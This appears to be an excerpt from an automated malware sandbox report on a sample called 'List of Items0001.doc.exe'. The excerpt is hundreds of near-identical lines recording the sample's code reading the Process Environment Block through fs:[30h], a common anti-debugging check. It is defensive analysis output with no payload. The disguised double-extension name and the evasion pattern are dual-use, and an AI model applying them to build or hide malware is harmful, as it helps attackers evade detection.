        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326751C0 mov eax, dword ptr fs:[00000030h]3_2_326751C0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326751C0 mov eax, dword ptr fs:[00000030h]3_2_326751C0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326751C0 mov eax, dword ptr fs:[00000030h]3_2_326751C0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326751C0 mov eax, dword ptr fs:[00000030h]3_2_326751C0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_327351B6 mov eax, dword ptr fs:[00000030h]3_2_327351B6
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269E1A4 mov eax, dword ptr fs:[00000030h]3_2_3269E1A4
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269E1A4 mov eax, dword ptr fs:[00000030h]3_2_3269E1A4
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326941BB mov ecx, dword ptr fs:[00000030h]3_2_326941BB
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326941BB mov eax, dword ptr fs:[00000030h]3_2_326941BB
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326941BB mov eax, dword ptr fs:[00000030h]3_2_326941BB
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326931BE mov eax, dword ptr fs:[00000030h]3_2_326931BE
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326931BE mov eax, dword ptr fs:[00000030h]3_2_326931BE
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32664180 mov eax, dword ptr fs:[00000030h]3_2_32664180
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32664180 mov eax, dword ptr fs:[00000030h]3_2_32664180
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32664180 mov eax, dword ptr fs:[00000030h]3_2_32664180
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326A1190 mov eax, dword ptr fs:[00000030h]3_2_326A1190
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326A1190 mov eax, dword ptr fs:[00000030h]3_2_326A1190
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32689194 mov eax, dword ptr fs:[00000030h]3_2_32689194
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269666D mov esi, dword ptr fs:[00000030h]3_2_3269666D
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269666D mov eax, dword ptr fs:[00000030h]3_2_3269666D
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269666D mov eax, dword ptr fs:[00000030h]3_2_3269666D
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32673660 mov eax, dword ptr fs:[00000030h]3_2_32673660
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32673660 mov eax, dword ptr fs:[00000030h]3_2_32673660
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32673660 mov eax, dword ptr fs:[00000030h]3_2_32673660
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32657662 mov eax, dword ptr fs:[00000030h]3_2_32657662
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32657662 mov eax, dword ptr fs:[00000030h]3_2_32657662
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32657662 mov eax, dword ptr fs:[00000030h]3_2_32657662
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32660670 mov eax, dword ptr fs:[00000030h]3_2_32660670
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326A2670 mov eax, dword ptr fs:[00000030h]3_2_326A2670
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326A2670 mov eax, dword ptr fs:[00000030h]3_2_326A2670
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32663640 mov eax, dword ptr fs:[00000030h]3_2_32663640
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3267F640 mov eax, dword ptr fs:[00000030h]3_2_3267F640
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3267F640 mov eax, dword ptr fs:[00000030h]3_2_3267F640
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3267F640 mov eax, dword ptr fs:[00000030h]3_2_3267F640
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269C640 mov eax, dword ptr fs:[00000030h]3_2_3269C640
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269C640 mov eax, dword ptr fs:[00000030h]3_2_3269C640
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265D64A mov eax, dword ptr fs:[00000030h]3_2_3265D64A
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265D64A mov eax, dword ptr fs:[00000030h]3_2_3265D64A
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269265C mov eax, dword ptr fs:[00000030h]3_2_3269265C
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269265C mov ecx, dword ptr fs:[00000030h]3_2_3269265C
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269265C mov eax, dword ptr fs:[00000030h]3_2_3269265C
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3266965A mov eax, dword ptr fs:[00000030h]3_2_3266965A
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3266965A mov eax, dword ptr fs:[00000030h]3_2_3266965A
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32695654 mov eax, dword ptr fs:[00000030h]3_2_32695654
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32665622 mov eax, dword ptr fs:[00000030h]3_2_32665622
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32665622 mov eax, dword ptr fs:[00000030h]3_2_32665622
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269C620 mov eax, dword ptr fs:[00000030h]3_2_3269C620
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32660630 mov eax, dword ptr fs:[00000030h]3_2_32660630
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269F63F mov eax, dword ptr fs:[00000030h]3_2_3269F63F
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269F63F mov eax, dword ptr fs:[00000030h]3_2_3269F63F
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32690630 mov eax, dword ptr fs:[00000030h]3_2_32690630
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3270D62C mov ecx, dword ptr fs:[00000030h]3_2_3270D62C
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3270D62C mov ecx, dword ptr fs:[00000030h]3_2_3270D62C
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3270D62C mov eax, dword ptr fs:[00000030h]3_2_3270D62C
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326E8633 mov esi, dword ptr fs:[00000030h]3_2_326E8633
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326E8633 mov eax, dword ptr fs:[00000030h]3_2_326E8633
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326E8633 mov eax, dword ptr fs:[00000030h]3_2_326E8633
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269360F mov eax, dword ptr fs:[00000030h]3_2_3269360F
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326F3608 mov eax, dword ptr fs:[00000030h]3_2_326F3608
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326F3608 mov eax, dword ptr fs:[00000030h]3_2_326F3608
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326F3608 mov eax, dword ptr fs:[00000030h]3_2_326F3608
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326F3608 mov eax, dword ptr fs:[00000030h]3_2_326F3608
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326F3608 mov eax, dword ptr fs:[00000030h]3_2_326F3608
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326F3608 mov eax, dword ptr fs:[00000030h]3_2_326F3608
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268D600 mov eax, dword ptr fs:[00000030h]3_2_3268D600
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268D600 mov eax, dword ptr fs:[00000030h]3_2_3268D600
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32734600 mov eax, dword ptr fs:[00000030h]3_2_32734600
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3271F607 mov eax, dword ptr fs:[00000030h]3_2_3271F607
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326596E0 mov eax, dword ptr fs:[00000030h]3_2_326596E0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326596E0 mov eax, dword ptr fs:[00000030h]3_2_326596E0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326656E0 mov eax, dword ptr fs:[00000030h]3_2_326656E0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326656E0 mov eax, dword ptr fs:[00000030h]3_2_326656E0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326656E0 mov eax, dword ptr fs:[00000030h]3_2_326656E0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326866E0 mov eax, dword ptr fs:[00000030h]3_2_326866E0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326866E0 mov eax, dword ptr fs:[00000030h]3_2_326866E0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326DC6F2 mov eax, dword ptr fs:[00000030h]3_2_326DC6F2
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326DC6F2 mov eax, dword ptr fs:[00000030h]3_2_326DC6F2
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326606CF mov eax, dword ptr fs:[00000030h]3_2_326606CF
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3272A6C0 mov eax, dword ptr fs:[00000030h]3_2_3272A6C0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_327086C2 mov eax, dword ptr fs:[00000030h]3_2_327086C2
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268D6D0 mov eax, dword ptr fs:[00000030h]3_2_3268D6D0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_327286A8 mov eax, dword ptr fs:[00000030h]3_2_327286A8
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_327286A8 mov eax, dword ptr fs:[00000030h]3_2_327286A8
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32670680 mov eax, dword ptr fs:[00000030h]3_2_32670680
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32670680 mov eax, dword ptr fs:[00000030h]3_2_32670680
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32670680 mov eax, dword ptr fs:[00000030h]3_2_32670680
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32670680 mov eax, dword ptr fs:[00000030h]3_2_32670680
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32670680 mov eax, dword ptr fs:[00000030h]3_2_32670680
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32670680 mov eax, dword ptr fs:[00000030h]3_2_32670680
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32670680 mov eax, dword ptr fs:[00000030h]3_2_32670680
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32670680 mov eax, dword ptr fs:[00000030h]3_2_32670680
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32670680 mov eax, dword ptr fs:[00000030h]3_2_32670680
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32670680 mov eax, dword ptr fs:[00000030h]3_2_32670680
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32670680 mov eax, dword ptr fs:[00000030h]3_2_32670680
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32670680 mov eax, dword ptr fs:[00000030h]3_2_32670680
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32668690 mov eax, dword ptr fs:[00000030h]3_2_32668690
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3271F68C mov eax, dword ptr fs:[00000030h]3_2_3271F68C
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326EC691 mov eax, dword ptr fs:[00000030h]3_2_326EC691
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32672760 mov ecx, dword ptr fs:[00000030h]3_2_32672760
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326A1763 mov eax, dword ptr fs:[00000030h]3_2_326A1763
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326A1763 mov eax, dword ptr fs:[00000030h]3_2_326A1763
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326A1763 mov eax, dword ptr fs:[00000030h]3_2_326A1763
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326A1763 mov eax, dword ptr fs:[00000030h]3_2_326A1763
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326A1763 mov eax, dword ptr fs:[00000030h]3_2_326A1763
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326A1763 mov eax, dword ptr fs:[00000030h]3_2_326A1763
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32690774 mov eax, dword ptr fs:[00000030h]3_2_32690774
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32664779 mov eax, dword ptr fs:[00000030h]3_2_32664779
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32664779 mov eax, dword ptr fs:[00000030h]3_2_32664779
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3270E750 mov eax, dword ptr fs:[00000030h]3_2_3270E750
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269174A mov eax, dword ptr fs:[00000030h]3_2_3269174A
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32693740 mov eax, dword ptr fs:[00000030h]3_2_32693740
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269A750 mov eax, dword ptr fs:[00000030h]3_2_3269A750
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32682755 mov eax, dword ptr fs:[00000030h]3_2_32682755
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32682755 mov eax, dword ptr fs:[00000030h]3_2_32682755
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32682755 mov eax, dword ptr fs:[00000030h]3_2_32682755
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32682755 mov ecx, dword ptr fs:[00000030h]3_2_32682755
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32682755 mov eax, dword ptr fs:[00000030h]3_2_32682755
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32682755 mov eax, dword ptr fs:[00000030h]3_2_32682755
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265F75B mov eax, dword ptr fs:[00000030h]3_2_3265F75B
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265F75B mov eax, dword ptr fs:[00000030h]3_2_3265F75B
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265F75B mov eax, dword ptr fs:[00000030h]3_2_3265F75B
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265F75B mov eax, dword ptr fs:[00000030h]3_2_3265F75B
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265F75B mov eax, dword ptr fs:[00000030h]3_2_3265F75B
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265F75B mov eax, dword ptr fs:[00000030h]3_2_3265F75B
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265F75B mov eax, dword ptr fs:[00000030h]3_2_3265F75B
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265F75B mov eax, dword ptr fs:[00000030h]3_2_3265F75B
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265F75B mov eax, dword ptr fs:[00000030h]3_2_3265F75B
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32689723 mov eax, dword ptr fs:[00000030h]3_2_32689723
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265B705 mov eax, dword ptr fs:[00000030h]3_2_3265B705
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265B705 mov eax, dword ptr fs:[00000030h]3_2_3265B705
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265B705 mov eax, dword ptr fs:[00000030h]3_2_3265B705
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265B705 mov eax, dword ptr fs:[00000030h]3_2_3265B705
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268270D mov eax, dword ptr fs:[00000030h]3_2_3268270D
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268270D mov eax, dword ptr fs:[00000030h]3_2_3268270D
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268270D mov eax, dword ptr fs:[00000030h]3_2_3268270D
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3266D700 mov ecx, dword ptr fs:[00000030h]3_2_3266D700
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3271F717 mov eax, dword ptr fs:[00000030h]3_2_3271F717
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3272970B mov eax, dword ptr fs:[00000030h]3_2_3272970B
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3272970B mov eax, dword ptr fs:[00000030h]3_2_3272970B
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3266471B mov eax, dword ptr fs:[00000030h]3_2_3266471B
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3266471B mov eax, dword ptr fs:[00000030h]3_2_3266471B
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326637E4 mov eax, dword ptr fs:[00000030h]3_2_326637E4
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326637E4 mov eax, dword ptr fs:[00000030h]3_2_326637E4
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326637E4 mov eax, dword ptr fs:[00000030h]3_2_326637E4
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326637E4 mov eax, dword ptr fs:[00000030h]3_2_326637E4
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326637E4 mov eax, dword ptr fs:[00000030h]3_2_326637E4
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326637E4 mov eax, dword ptr fs:[00000030h]3_2_326637E4
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326637E4 mov eax, dword ptr fs:[00000030h]3_2_326637E4
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268E7E0 mov eax, dword ptr fs:[00000030h]3_2_3268E7E0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3271F7CF mov eax, dword ptr fs:[00000030h]3_2_3271F7CF
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326607A7 mov eax, dword ptr fs:[00000030h]3_2_326607A7
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_327317BC mov eax, dword ptr fs:[00000030h]3_2_327317BC
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3272D7A7 mov eax, dword ptr fs:[00000030h]3_2_3272D7A7
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3272D7A7 mov eax, dword ptr fs:[00000030h]3_2_3272D7A7
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3272D7A7 mov eax, dword ptr fs:[00000030h]3_2_3272D7A7
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326DE79D mov eax, dword ptr fs:[00000030h]3_2_326DE79D
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326DE79D mov eax, dword ptr fs:[00000030h]3_2_326DE79D
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326DE79D mov eax, dword ptr fs:[00000030h]3_2_326DE79D
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326DE79D mov eax, dword ptr fs:[00000030h]3_2_326DE79D
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326DE79D mov eax, dword ptr fs:[00000030h]3_2_326DE79D
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326DE79D mov eax, dword ptr fs:[00000030h]3_2_326DE79D
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326DE79D mov eax, dword ptr fs:[00000030h]3_2_326DE79D
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326DE79D mov eax, dword ptr fs:[00000030h]3_2_326DE79D
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326DE79D mov eax, dword ptr fs:[00000030h]3_2_326DE79D
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32691796 mov eax, dword ptr fs:[00000030h]3_2_32691796
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32691796 mov eax, dword ptr fs:[00000030h]3_2_32691796
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3271F478 mov eax, dword ptr fs:[00000030h]3_2_3271F478
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32668470 mov eax, dword ptr fs:[00000030h]3_2_32668470
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32668470 mov eax, dword ptr fs:[00000030h]3_2_32668470
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3272A464 mov eax, dword ptr fs:[00000030h]3_2_3272A464
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32670445 mov eax, dword ptr fs:[00000030h]3_2_32670445
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32670445 mov eax, dword ptr fs:[00000030h]3_2_32670445
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32670445 mov eax, dword ptr fs:[00000030h]3_2_32670445
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32670445 mov eax, dword ptr fs:[00000030h]3_2_32670445
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32670445 mov eax, dword ptr fs:[00000030h]3_2_32670445
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32670445 mov eax, dword ptr fs:[00000030h]3_2_32670445
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3266D454 mov eax, dword ptr fs:[00000030h]3_2_3266D454
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3266D454 mov eax, dword ptr fs:[00000030h]3_2_3266D454
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3266D454 mov eax, dword ptr fs:[00000030h]3_2_3266D454
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3266D454 mov eax, dword ptr fs:[00000030h]3_2_3266D454
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3266D454 mov eax, dword ptr fs:[00000030h]3_2_3266D454
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3266D454 mov eax, dword ptr fs:[00000030h]3_2_3266D454
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268E45E mov eax, dword ptr fs:[00000030h]3_2_3268E45E
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268E45E mov eax, dword ptr fs:[00000030h]3_2_3268E45E
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268E45E mov eax, dword ptr fs:[00000030h]3_2_3268E45E
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268E45E mov eax, dword ptr fs:[00000030h]3_2_3268E45E
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268E45E mov eax, dword ptr fs:[00000030h]3_2_3268E45E
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269D450 mov eax, dword ptr fs:[00000030h]3_2_3269D450
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269D450 mov eax, dword ptr fs:[00000030h]3_2_3269D450
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326EF42F mov eax, dword ptr fs:[00000030h]3_2_326EF42F
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326EF42F mov eax, dword ptr fs:[00000030h]3_2_326EF42F
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326EF42F mov eax, dword ptr fs:[00000030h]3_2_326EF42F
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326EF42F mov eax, dword ptr fs:[00000030h]3_2_326EF42F
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326EF42F mov eax, dword ptr fs:[00000030h]3_2_326EF42F
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265B420 mov eax, dword ptr fs:[00000030h]3_2_3265B420
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326E9429 mov eax, dword ptr fs:[00000030h]3_2_326E9429
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32697425 mov eax, dword ptr fs:[00000030h]3_2_32697425
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32697425 mov ecx, dword ptr fs:[00000030h]3_2_32697425
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265640D mov eax, dword ptr fs:[00000030h]3_2_3265640D
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326F6400 mov eax, dword ptr fs:[00000030h]3_2_326F6400
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326F6400 mov eax, dword ptr fs:[00000030h]3_2_326F6400
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3271F409 mov eax, dword ptr fs:[00000030h]3_2_3271F409
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269E4EF mov eax, dword ptr fs:[00000030h]3_2_3269E4EF
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269E4EF mov eax, dword ptr fs:[00000030h]3_2_3269E4EF
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326954E0 mov eax, dword ptr fs:[00000030h]3_2_326954E0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3271F4FD mov eax, dword ptr fs:[00000030h]3_2_3271F4FD
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326894FA mov eax, dword ptr fs:[00000030h]3_2_326894FA
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326664F0 mov eax, dword ptr fs:[00000030h]3_2_326664F0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269A4F0 mov eax, dword ptr fs:[00000030h]3_2_3269A4F0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269A4F0 mov eax, dword ptr fs:[00000030h]3_2_3269A4F0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326814C9 mov eax, dword ptr fs:[00000030h]3_2_326814C9
